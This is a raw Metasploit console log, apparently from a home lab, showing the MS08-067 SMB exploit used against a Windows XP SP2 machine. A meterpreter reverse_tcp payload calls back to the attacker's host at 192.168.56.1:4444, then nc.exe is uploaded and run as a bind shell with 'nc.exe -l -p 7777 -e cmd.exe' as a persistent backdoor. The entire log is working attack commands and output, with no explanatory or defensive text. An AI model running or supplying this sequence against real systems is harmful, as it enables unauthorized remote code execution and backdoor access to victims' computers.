msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.2
RHOST => 192.168.56.2
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.2     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.2
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.2:1038) at 2011-07-03 00:45:42 +0700
meterpreter > upload /root/Desktop/nc.exe c:\\
[*] uploading : /root/Desktop/nc.exe -> c:\
[*] uploaded : /root/Desktop/nc.exe -> c:\\nc.exe
meterpreter > shell
Process 576 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd ..
cd ..
C:\WINDOWS>cd ..
cd ..
C:\>cls
cls
C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 78F1-F486

 Directory of C:\

06/26/2011  12:49 AM                 0 AUTOEXEC.BAT
06/26/2011  12:49 AM                 0 CONFIG.SYS
06/26/2011  05:45 PM    <DIR>          Documents and Settings
07/03/2011  01:19 AM            59,392 nc.exe
06/26/2011  01:01 AM    <DIR>          Program Files
06/29/2011  03:31 AM    <DIR>          rain
06/29/2011  03:33 AM    <DIR>          uun
06/29/2011  12:49 AM    <DIR>          WINDOWS
               3 File(s)         59,392 bytes
               5 Dir(s)   3,695,656,960 bytes free
C:\>nc.exe
nc.exe
Cmd line:
no port[s] to connect to
C:\>nc.exe -l -p 7777 -e cmd.exe
nc.exe -l -p 7777 -e cmd.exe
[root@Novemberain][~]
[#] nc 192.168.56.2 7777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>
C:\>netstat -an
netstat -an
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.56.2:139       0.0.0.0:0              LISTENING
  TCP    192.168.56.2:1034      192.168.56.1:4444      CLOSE_WAIT
  TCP    192.168.56.2:7777      192.168.56.1:47816     ESTABLISHED